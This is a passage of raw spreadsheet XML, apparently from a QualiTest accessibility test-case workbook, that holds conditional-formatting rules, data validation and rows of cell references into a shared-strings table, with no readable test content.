      <formula>NOT(ISERROR(SEARCH($A$128,E48)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="168" priority="21">
      <formula>NOT(ISERROR(SEARCH($A$127,E48)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E54:E61">
    <cfRule type="expression" dxfId="167" priority="22">
      <formula>NOT(ISERROR(SEARCH($A$130,E54)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="166" priority="23">
      <formula>NOT(ISERROR(SEARCH($A$129,E54)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="165" priority="24">
      <formula>NOT(ISERROR(SEARCH($A$128,E54)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="164" priority="25">
      <formula>NOT(ISERROR(SEARCH($A$127,E54)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E64:E90">
    <cfRule type="expression" dxfId="163" priority="26">
      <formula>NOT(ISERROR(SEARCH($A$130,E64)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="162" priority="27">
      <formula>NOT(ISERROR(SEARCH($A$129,E64)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="161" priority="28">
      <formula>NOT(ISERROR(SEARCH($A$128,E64)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="160" priority="29">
      <formula>NOT(ISERROR(SEARCH($A$127,E64)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E93:E94">
    <cfRule type="expression" dxfId="159" priority="30">
      <formula>NOT(ISERROR(SEARCH($A$130,E93)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="158" priority="31">
      <formula>NOT(ISERROR(SEARCH($A$129,E93)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="157" priority="32">
      <formula>NOT(ISERROR(SEARCH($A$128,E93)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="156" priority="33">
      <formula>NOT(ISERROR(SEARCH($A$127,E93)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E97:E99">
    <cfRule type="expression" dxfId="155" priority="34">
      <formula>NOT(ISERROR(SEARCH($A$130,E97)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="154" priority="35">
      <formula>NOT(ISERROR(SEARCH($A$129,E97)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="153" priority="36">
      <formula>NOT(ISERROR(SEARCH($A$128,E97)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="152" priority="37">
      <formula>NOT(ISERROR(SEARCH($A$127,E97)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E102:E110">
    <cfRule type="expression" dxfId="151" priority="38">
      <formula>NOT(ISERROR(SEARCH($A$130,E102)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="150" priority="39">
      <formula>NOT(ISERROR(SEARCH($A$129,E102)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="149" priority="40">
      <formula>NOT(ISERROR(SEARCH($A$128,E102)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="148" priority="41">
      <formula>NOT(ISERROR(SEARCH($A$127,E102)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E113:E124">
    <cfRule type="expression" dxfId="147" priority="42">
      <formula>NOT(ISERROR(SEARCH($A$130,E113)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="146" priority="43">
      <formula>NOT(ISERROR(SEARCH($A$129,E113)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="145" priority="44">
      <formula>NOT(ISERROR(SEARCH($A$128,E113)))</formula>
    </cfRule>
    <cfRule type="expression" dxfId="144" priority="45">
      <formula>NOT(ISERROR(SEARCH($A$127,E113)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" errorStyle="information" allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="result" sqref="E5:E14 E17:E24 E27:E33 E36:E45 E48:E51 E54:E61 E64:E90 E93:E94 E97:E99 E102:E110 E113:E124" xr:uid="{00000000-0002-0000-0200-000000000000}">
      <formula1>$A$127:$A$130</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.3" bottom="0.3" header="0.3" footer="0.3"/>
  <pageSetup orientation="portrait" useFirstPageNumber="1" horizontalDpi="300" verticalDpi="300"/>
  <headerFooter differentFirst="1"/>
  <tableParts count="11">
    <tablePart r:id="rId1"/>
    <tablePart r:id="rId2"/>
    <tablePart r:id="rId3"/>
    <tablePart r:id="rId4"/>
    <tablePart r:id="rId5"/>
    <tablePart r:id="rId6"/>
    <tablePart r:id="rId7"/>
    <tablePart r:id="rId8"/>
    <tablePart r:id="rId9"/>
    <tablePart r:id="rId10"/>
    <tablePart r:id="rId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topLeftCell="A4" zoomScalePageLayoutView="60" workbookViewId="0">
      <selection activeCell="C10" sqref="C10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.54296875" defaultRowHeight="15.5"/>
  <cols>
    <col min="1" max="1" width="8.6328125" style="84" customWidth="1"/>
    <col min="2" max="2" width="23.6328125" style="85" customWidth="1"/>
    <col min="3" max="3" width="84" customWidth="1"/>
    <col min="4" max="4" width="9.81640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="14.5">
      <c r="A1" s="86" t="s">
        <v>484</v>
      </c>
      <c r="B1" s="86" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="87" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="2" spans="1:3" ht="112.5">
      <c r="A2" s="45">
        <v>1</v>
      </c>
      <c r="B2" s="88" t="s">
        <v>485</v>
      </c>
      <c r="C2" s="10" t="s">
        <v>486</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="112.5">
      <c r="A3" s="45">
        <v>2</v>
      </c>
      <c r="B3" s="88" t="s">
        <v>487</v>
      </c>
      <c r="C3" s="10" t="s">
        <v>488</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="137.5">
      <c r="A4" s="45">
        <v>3</v>
      </c>
      <c r="B4" s="89" t="s">
        <v>489</v>
      </c>
      <c r="C4" s="10" t="s">
        <v>490</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.74791666666666701" right="0.74791666666666701" top="0.51180555555555596" bottom="0.51180555555555596" header="0.51180555555555596" footer="0.51180555555555596"/>
  <pageSetup paperSize="75" orientation="landscape" horizontalDpi="300" verticalDpi="300"/>
  <headerFooter differentFirst="1">
    <oddHeader>&amp;L&amp;"Arial,Bold"&amp;16QualiTest Accessibility Testcase</oddHeader>
    <oddFooter>&amp;L&amp;8&amp;F
Last Printed &amp;D &amp;T&amp;C&amp;8Page &amp;P of &amp;N&amp;R&amp;8Commercial in Confidence
© QualiTest Software Testing Limited 2014</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I192"/>
  <sheetViews>
    <sheetView topLeftCell="E161" zoomScalePageLayoutView="60" workbookViewId="0">
      <selection activeCell="G77" sqref="G1:G1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.6328125" defaultRowHeight="12.5"/>
  <cols>
    <col min="1" max="1" width="11.6328125" style="2" customWidth="1"/>
    <col min="2" max="2" width="28.08984375" style="2" customWidth="1"/>
    <col min="3" max="3" width="23.7265625" style="2" customWidth="1"/>
    <col min="4" max="4" width="121.7265625" style="10" customWidth="1"/>
    <col min="5" max="5" width="39.453125" style="10" customWidth="1"/>
    <col min="6" max="6" width="22.90625" style="10" customWidth="1"/>
    <col min="7" max="7" width="47.26953125" style="10" customWidth="1"/>
    <col min="8" max="8" width="11.08984375" style="2" customWidth="1"/>
    <col min="9" max="9" width="8" style="2" customWidth="1"/>
    <col min="10" max="10" width="22.6328125" style="2" customWidth="1"/>
    <col min="11" max="11" width="9.54296875" style="2" customWidth="1"/>
    <col min="12" max="1023" width="8.6328125" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="23.25" customHeight="1"/>
    <row r="2" spans="1:10">
      <c r="C2" s="72"/>
    </row>
    <row r="3" spans="1:10" ht="26">
      <c r="A3" s="17" t="s">
        <v>491</v>
      </c>
      <c r="B3" s="17" t="s">
        <v>45</v>
      </c>
      <c r="C3" s="17"/>
      <c r="D3"/>
      <c r="E3" s="18"/>
      <c r="F3" s="19"/>
      <c r="G3" s="19"/>
      <c r="H3" s="20"/>
    </row>
    <row r="4" spans="1:10">
      <c r="A4" s="21"/>
      <c r="B4" s="21"/>
      <c r="C4" s="21"/>
      <c r="D4" s="19"/>
      <c r="E4" s="18"/>
      <c r="F4" s="19"/>
      <c r="G4" s="19"/>
      <c r="H4" s="20"/>
    </row>
    <row r="5" spans="1:10" s="26" customFormat="1">
      <c r="A5" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B5" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C5" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D5" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E5" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F5" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G5" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H5" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I5" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J5" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="6" spans="1:10" ht="35" customHeight="1">
      <c r="A6" s="21">
        <v>1.1000000000000001</v>
      </c>
      <c r="B6" s="10" t="s">
        <v>501</v>
      </c>
      <c r="C6" s="21" t="s">
        <v>502</v>
      </c>
      <c r="D6" s="10" t="s">
        <v>503</v>
      </c>
      <c r="F6" s="35"/>
      <c r="G6" s="12"/>
      <c r="H6" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="7" spans="1:10" ht="25.5">
      <c r="A7" s="73"/>
      <c r="B7" s="73"/>
      <c r="C7" s="73"/>
      <c r="D7" s="10" t="s">
        <v>505</v>
      </c>
      <c r="F7" s="52"/>
      <c r="G7" s="45"/>
      <c r="H7" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="8" spans="1:10" ht="225">
      <c r="A8" s="24"/>
      <c r="B8" s="24"/>
      <c r="C8" s="24"/>
      <c r="D8" s="10" t="s">
        <v>506</v>
      </c>
      <c r="E8" s="7" t="s">
        <v>507</v>
      </c>
      <c r="F8" s="52"/>
      <c r="G8" s="45" t="s">
        <v>508</v>
      </c>
      <c r="H8" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="9" spans="1:10" s="27" customFormat="1">
      <c r="D9" s="32"/>
      <c r="E9" s="32"/>
      <c r="F9" s="32"/>
      <c r="G9" s="32"/>
    </row>
    <row r="10" spans="1:10" ht="35" customHeight="1">
      <c r="A10" s="24">
        <v>1.2</v>
      </c>
      <c r="B10" s="10" t="s">
        <v>509</v>
      </c>
      <c r="C10" s="10" t="s">
        <v>510</v>
      </c>
      <c r="D10" s="10" t="s">
        <v>511</v>
      </c>
      <c r="H10" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="11" spans="1:10" ht="25.5">
      <c r="D11" s="10" t="s">
        <v>512</v>
      </c>
      <c r="H11" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="12" spans="1:10" ht="225">
      <c r="D12" s="10" t="s">
        <v>513</v>
      </c>
      <c r="E12" s="7" t="s">
        <v>507</v>
      </c>
      <c r="G12" s="10" t="s">
        <v>508</v>
      </c>
      <c r="H12" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="13" spans="1:10">
      <c r="E13" s="7"/>
    </row>
    <row r="14" spans="1:10" ht="35" customHeight="1">
      <c r="A14" s="33">
        <v>1.3</v>
      </c>
      <c r="B14" s="10" t="s">
        <v>514</v>
      </c>
      <c r="C14" s="21" t="s">
        <v>502</v>
      </c>
      <c r="D14" s="10" t="s">
        <v>503</v>
      </c>
      <c r="E14" s="7"/>
      <c r="H14" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="15" spans="1:10" ht="25.5">
      <c r="A15" s="73"/>
      <c r="B15" s="73"/>
      <c r="C15" s="73"/>
      <c r="D15" s="10" t="s">
        <v>505</v>
      </c>
      <c r="E15" s="7"/>
      <c r="H15" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="16" spans="1:10" ht="187.5">
      <c r="A16" s="24"/>
      <c r="B16" s="24"/>
      <c r="C16" s="24"/>
      <c r="D16" s="10" t="s">
        <v>515</v>
      </c>
      <c r="E16" s="7" t="s">
        <v>507</v>
      </c>
      <c r="G16" s="10" t="s">
        <v>508</v>
      </c>
      <c r="H16" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="17" spans="1:10">
      <c r="E17" s="7"/>
    </row>
    <row r="18" spans="1:10" ht="35" customHeight="1">
      <c r="A18" s="74">
        <v>1.4</v>
      </c>
      <c r="B18" s="10" t="s">
        <v>516</v>
      </c>
      <c r="C18" s="10" t="s">
        <v>517</v>
      </c>
      <c r="D18" s="10" t="s">
        <v>511</v>
      </c>
      <c r="H18" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="19" spans="1:10" ht="25.5">
      <c r="D19" s="10" t="s">
        <v>512</v>
      </c>
      <c r="H19" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="20" spans="1:10" ht="100">
      <c r="D20" s="10" t="s">
        <v>518</v>
      </c>
      <c r="E20" s="7" t="s">
        <v>507</v>
      </c>
      <c r="G20" s="10" t="s">
        <v>508</v>
      </c>
      <c r="H20" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="21" spans="1:10">
      <c r="E21" s="7"/>
    </row>
    <row r="22" spans="1:10" ht="35" customHeight="1">
      <c r="A22" s="74">
        <v>1.5</v>
      </c>
      <c r="B22" s="10" t="s">
        <v>519</v>
      </c>
      <c r="C22" s="10" t="s">
        <v>520</v>
      </c>
      <c r="D22" s="10" t="s">
        <v>511</v>
      </c>
      <c r="E22" s="7"/>
    </row>
    <row r="23" spans="1:10" ht="25.5">
      <c r="D23" s="10" t="s">
        <v>505</v>
      </c>
      <c r="E23" s="7"/>
    </row>
    <row r="24" spans="1:10" ht="25">
      <c r="D24" s="10" t="s">
        <v>521</v>
      </c>
      <c r="E24" s="7"/>
    </row>
    <row r="25" spans="1:10" ht="200">
      <c r="D25" s="10" t="s">
        <v>522</v>
      </c>
      <c r="E25" s="7" t="s">
        <v>507</v>
      </c>
      <c r="G25" s="75" t="s">
        <v>523</v>
      </c>
      <c r="J25" s="78" t="s">
        <v>524</v>
      </c>
    </row>
    <row r="26" spans="1:10" s="27" customFormat="1">
      <c r="D26" s="32"/>
      <c r="E26" s="32"/>
      <c r="F26" s="32"/>
      <c r="G26" s="32"/>
    </row>
    <row r="27" spans="1:10" ht="26">
      <c r="A27" s="17" t="s">
        <v>525</v>
      </c>
      <c r="B27" s="17" t="s">
        <v>50</v>
      </c>
      <c r="C27" s="17"/>
    </row>
    <row r="29" spans="1:10" s="26" customFormat="1">
      <c r="A29" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B29" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C29" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D29" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E29" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F29" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G29" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H29" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I29" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J29" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="30" spans="1:10" ht="35" customHeight="1">
      <c r="A30" s="2">
        <v>2.1</v>
      </c>
      <c r="B30" s="10" t="s">
        <v>526</v>
      </c>
      <c r="C30" s="21" t="s">
        <v>527</v>
      </c>
      <c r="D30" s="10" t="s">
        <v>528</v>
      </c>
    </row>
    <row r="31" spans="1:10" ht="25.5">
      <c r="D31" s="10" t="s">
        <v>505</v>
      </c>
    </row>
    <row r="32" spans="1:10" ht="287.5">
      <c r="D32" s="10" t="s">
        <v>529</v>
      </c>
      <c r="E32" s="10" t="s">
        <v>530</v>
      </c>
      <c r="G32" s="75" t="s">
        <v>531</v>
      </c>
      <c r="J32" s="78" t="s">
        <v>532</v>
      </c>
    </row>
    <row r="33" spans="1:10" s="27" customFormat="1" ht="20.25" customHeight="1">
      <c r="D33" s="32"/>
      <c r="E33" s="32"/>
      <c r="F33" s="32"/>
      <c r="G33" s="32"/>
    </row>
    <row r="34" spans="1:10" ht="35" customHeight="1">
      <c r="A34" s="2">
        <v>2.2000000000000002</v>
      </c>
      <c r="B34" s="10" t="s">
        <v>533</v>
      </c>
      <c r="C34" s="10" t="s">
        <v>534</v>
      </c>
      <c r="D34" s="10" t="s">
        <v>535</v>
      </c>
    </row>
    <row r="35" spans="1:10" ht="25.5">
      <c r="D35" s="10" t="s">
        <v>536</v>
      </c>
    </row>
    <row r="36" spans="1:10" ht="250">
      <c r="D36" s="10" t="s">
        <v>537</v>
      </c>
      <c r="E36" s="10" t="s">
        <v>538</v>
      </c>
      <c r="G36" s="75" t="s">
        <v>523</v>
      </c>
      <c r="J36" s="78" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="37" spans="1:10" s="27" customFormat="1">
      <c r="D37" s="32"/>
      <c r="E37" s="32"/>
      <c r="F37" s="32"/>
      <c r="G37" s="32"/>
    </row>
    <row r="38" spans="1:10" ht="26">
      <c r="A38" s="17" t="s">
        <v>540</v>
      </c>
      <c r="B38" s="17" t="s">
        <v>54</v>
      </c>
      <c r="C38" s="17"/>
      <c r="D38" s="15"/>
      <c r="E38" s="18"/>
      <c r="F38" s="19"/>
      <c r="G38" s="19"/>
      <c r="H38" s="20"/>
    </row>
    <row r="40" spans="1:10" s="26" customFormat="1">
      <c r="A40" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B40" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C40" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D40" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E40" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F40" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G40" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H40" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I40" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J40" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="41" spans="1:10" ht="35" customHeight="1">
      <c r="A41" s="21">
        <v>3.1</v>
      </c>
      <c r="B41" s="10" t="s">
        <v>541</v>
      </c>
      <c r="C41" s="21" t="s">
        <v>542</v>
      </c>
      <c r="D41" s="23" t="s">
        <v>543</v>
      </c>
      <c r="F41" s="12"/>
      <c r="G41" s="12"/>
    </row>
    <row r="42" spans="1:10" ht="150">
      <c r="D42" s="10" t="s">
        <v>544</v>
      </c>
      <c r="E42" s="10" t="s">
        <v>545</v>
      </c>
      <c r="G42" s="76" t="s">
        <v>531</v>
      </c>
      <c r="J42" s="79" t="s">
        <v>546</v>
      </c>
    </row>
    <row r="43" spans="1:10" s="27" customFormat="1">
      <c r="D43" s="32"/>
      <c r="E43" s="32"/>
      <c r="F43" s="32"/>
      <c r="G43" s="32"/>
    </row>
    <row r="45" spans="1:10" ht="26">
      <c r="A45" s="17" t="s">
        <v>547</v>
      </c>
      <c r="B45" s="17" t="s">
        <v>57</v>
      </c>
      <c r="C45" s="17"/>
      <c r="D45"/>
      <c r="E45" s="18"/>
      <c r="F45" s="19"/>
      <c r="G45" s="19"/>
      <c r="H45" s="20"/>
    </row>
    <row r="46" spans="1:10" s="26" customFormat="1">
      <c r="A46" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B46" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C46" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D46" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E46" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F46" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G46" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H46" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I46" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J46" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="47" spans="1:10" ht="46.25" customHeight="1">
      <c r="A47" s="2">
        <v>4.0999999999999996</v>
      </c>
      <c r="B47" s="47" t="s">
        <v>548</v>
      </c>
      <c r="C47" s="10" t="s">
        <v>549</v>
      </c>
      <c r="D47" s="10" t="s">
        <v>528</v>
      </c>
    </row>
    <row r="48" spans="1:10" ht="50">
      <c r="D48" s="10" t="s">
        <v>550</v>
      </c>
      <c r="E48" s="10" t="s">
        <v>551</v>
      </c>
      <c r="H48" s="8" t="s">
        <v>552</v>
      </c>
      <c r="I48" s="8" t="s">
        <v>553</v>
      </c>
      <c r="J48" s="8" t="s">
        <v>554</v>
      </c>
    </row>
    <row r="49" spans="1:10" s="27" customFormat="1">
      <c r="D49" s="32"/>
      <c r="E49" s="32"/>
      <c r="F49" s="32"/>
      <c r="G49" s="32"/>
    </row>
    <row r="50" spans="1:10">
      <c r="A50" s="10"/>
      <c r="B50" s="10"/>
      <c r="C50" s="10"/>
      <c r="D50"/>
      <c r="E50" s="18"/>
      <c r="F50" s="19"/>
      <c r="G50" s="19"/>
      <c r="H50" s="20"/>
    </row>
    <row r="51" spans="1:10" ht="26">
      <c r="A51" s="17" t="s">
        <v>555</v>
      </c>
      <c r="B51" s="17" t="s">
        <v>60</v>
      </c>
      <c r="C51" s="17"/>
      <c r="D51"/>
      <c r="E51" s="18"/>
      <c r="F51" s="19"/>
      <c r="G51" s="19"/>
      <c r="H51" s="20"/>
    </row>
    <row r="52" spans="1:10" s="26" customFormat="1">
      <c r="A52" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B52" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C52" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D52" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E52" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F52" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G52" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H52" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I52" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J52" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="53" spans="1:10" ht="175">
      <c r="A53" s="2">
        <v>5.0999999999999996</v>
      </c>
      <c r="B53" s="10" t="s">
        <v>556</v>
      </c>
      <c r="C53" s="10" t="s">
        <v>557</v>
      </c>
      <c r="D53" s="10" t="s">
        <v>558</v>
      </c>
      <c r="E53" s="10" t="s">
        <v>559</v>
      </c>
      <c r="G53" s="8" t="s">
        <v>560</v>
      </c>
      <c r="H53" s="8" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="54" spans="1:10" s="27" customFormat="1">
      <c r="D54" s="32"/>
      <c r="E54" s="32"/>
      <c r="F54" s="32"/>
      <c r="G54" s="32"/>
    </row>
    <row r="55" spans="1:10" ht="13">
      <c r="A55" s="10"/>
      <c r="B55" s="10"/>
      <c r="C55" s="10"/>
      <c r="D55" s="15"/>
      <c r="E55" s="18"/>
      <c r="F55" s="19"/>
      <c r="G55" s="19"/>
      <c r="H55" s="20"/>
    </row>
    <row r="56" spans="1:10" ht="26">
      <c r="A56" s="17" t="s">
        <v>561</v>
      </c>
      <c r="B56" s="17" t="s">
        <v>63</v>
      </c>
      <c r="C56" s="17"/>
      <c r="D56" s="15"/>
      <c r="E56" s="18"/>
      <c r="F56" s="19"/>
      <c r="G56" s="19"/>
      <c r="H56" s="20"/>
    </row>
    <row r="57" spans="1:10" s="26" customFormat="1">
      <c r="A57" s="22" t="s">
        <v>43</v>
      </c>
      <c r="B57" s="22" t="s">
        <v>492</v>
      </c>
      <c r="C57" s="22" t="s">
        <v>493</v>
      </c>
      <c r="D57" s="22" t="s">
        <v>494</v>
      </c>
      <c r="E57" s="22" t="s">
        <v>495</v>
      </c>
      <c r="F57" s="22" t="s">
        <v>496</v>
      </c>
      <c r="G57" s="22" t="s">
        <v>497</v>
      </c>
      <c r="H57" s="22" t="s">
        <v>498</v>
      </c>
      <c r="I57" s="22" t="s">
        <v>499</v>
      </c>
      <c r="J57" s="22" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="58" spans="1:10" ht="35" customHeight="1">
      <c r="A58" s="2">
        <v>6.1</v>
      </c>
      <c r="B58" s="10" t="s">
        <v>562</v>
      </c>
      <c r="C58" s="21" t="s">
        <v>563</v>
      </c>
      <c r="D58" s="10" t="s">
        <v>564</v>
      </c>
      <c r="G58" s="8" t="s">
        <v>565</v>
      </c>
      <c r="H58" s="8" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="59" spans="1:10" ht="163.5">
      <c r="D59" s="10" t="s">
        <v>566</v>
      </c>
      <c r="E59" s="10" t="s">
        <v>567</v>
      </c>
      <c r="G59" s="8" t="s">
        <v>565</v>
      </c>
      <c r="H59" s="8" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="60" spans="1:10" ht="138">
      <c r="D60" s="10" t="s">
        <v>568</v>
      </c>
      <c r="E60" s="10" t="s">
        <v>569</v>
      </c>
      <c r="G60" s="8" t="s">
        <v>570</v>
      </c>
    </row>
    <row r="61" spans="1:10" ht="37.5">
      <c r="D61" s="10" t="s">
        <v>571</v>
      </c>
      <c r="E61" s="10" t="s">
        <v>572</v>
      </c>
    </row>
    <row r="62" spans="1:10" s="27" customFormat="1">
      <c r="D62" s="32"/>
      <c r="E62" s="32"/>
      <c r="F62" s="32"/>
      <c r="G62" s="32"/>
    </row>
    <row r="63" spans="1:10" ht="35" customHeight="1">
      <c r="A63" s="77">
        <v>6.2</v>
      </c>
      <c r="B63" s="10" t="s">
        <v>573</v>
      </c>
      <c r="C63" s="10" t="s">
        <v>574</v>
      </c>
      <c r="D63" s="10" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="64" spans="1:10" ht="188.5">
      <c r="A64" s="50"/>
      <c r="D64" s="10" t="s">
        <v>576</v>
      </c>
      <c r="E64" s="10" t="s">
        <v>572</v>
      </c>
    </row>
    <row r="65" spans="1:8" ht="162.5">
      <c r="A65" s="50"/>
      <c r="D65" s="10" t="s">
        <v>577</v>
      </c>
      <c r="E65" s="10" t="s">
        <v>572</v>
      </c>
    </row>
    <row r="66" spans="1:8" ht="50">
      <c r="A66" s="50"/>
      <c r="D66" s="10" t="s">
        <v>578</v>
      </c>
      <c r="E66" s="10" t="s">
        <v>572</v>
      </c>
    </row>
    <row r="67" spans="1:8" s="27" customFormat="1">
      <c r="D67" s="32"/>
      <c r="E67" s="32"/>
      <c r="F67" s="32"/>
      <c r="G67" s="32"/>
    </row>
    <row r="68" spans="1:8" ht="35" customHeight="1">
      <c r="A68" s="2">
        <v>6.3</v>
      </c>
      <c r="B68" s="2" t="s">
        <v>579</v>
      </c>
      <c r="C68" s="2" t="s">
        <v>580</v>
      </c>
      <c r="D68" s="10" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="69" spans="1:8" ht="187.5">
      <c r="D69" s="10" t="s">
        <v>581</v>
      </c>
      <c r="E69" s="10" t="s">
        <v>569</v>
      </c>
      <c r="G69" s="8" t="s">
        <v>582</v>
      </c>
    </row>
    <row r="70" spans="1:8" ht="162.5">
      <c r="D70" s="10" t="s">
        <v>577</v>
      </c>
      <c r="E70" s="10" t="s">
        <v>569</v>
      </c>
      <c r="G70" s="8" t="s">
        <v>582</v>
      </c>
    </row>
    <row r="71" spans="1:8" ht="37.5">
      <c r="D71" s="10" t="s">
        <v>583</v>
      </c>
      <c r="E71" s="10" t="s">
        <v>584</v>
      </c>
      <c r="G71" s="8" t="s">
        <v>585</v>
      </c>
    </row>
    <row r="72" spans="1:8">
      <c r="A72" s="27"/>
      <c r="B72" s="27"/>
      <c r="C72" s="27"/>
      <c r="D72" s="32"/>
      <c r="E72" s="32"/>
      <c r="F72" s="32"/>
      <c r="G72" s="32"/>
      <c r="H72" s="27"/>
    </row>
    <row r="73" spans="1:8" ht="35" customHeight="1">
      <c r="A73" s="2">
        <v>6.4</v>
      </c>
      <c r="B73" s="2" t="s">
        <v>586</v>
      </c>
      <c r="C73" s="2" t="s">
        <v>574</v>
      </c>
      <c r="D73" s="10" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="74" spans="1:8" ht="150">
      <c r="D74" s="10" t="s">
        <v>587</v>
      </c>
      <c r="E74" s="10" t="s">
        <v>569</v>
      </c>
      <c r="G74" s="8" t="s">
        <v>582</v>
      </c>
    </row>
    <row r="75" spans="1:8" ht="125">
      <c r="D75" s="10" t="s">
        <v>588</v>
      </c>
      <c r="E75" s="10" t="s">
        <v>569</v>
      </c>
      <c r="G75" s="8" t="s">
        <v>582</v>
      </c>
    </row>
    <row r="76" spans="1:8">
      <c r="A76" s="27"/>
      <c r="B76" s="27"/>
      <c r="C76" s="27"/>
      <c r="D76" s="32"/>
      <c r="E76" s="32"/>
      <c r="F76" s="32"/>
      <c r="G76" s="32"/>
      <c r="H76" s="27"/>
    </row>
    <row r="77" spans="1:8" ht="35" customHeight="1">
      <c r="A77" s="2">
        <v>6.5</v>
      </c>
      <c r="B77" s="2" t="s">
        <v>589</v>
      </c>
      <c r="C77" s="2" t="s">
        <v>574</v>
      </c>
      <c r="D77" s="10" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="78" spans="1:8" ht="137.5">
      <c r="D78" s="10" t="s">
        <v>590</v>
      </c>
      <c r="E78" s="10" t="s">
        <v>569</v>
      </c>
      <c r="G78" s="8" t="s">
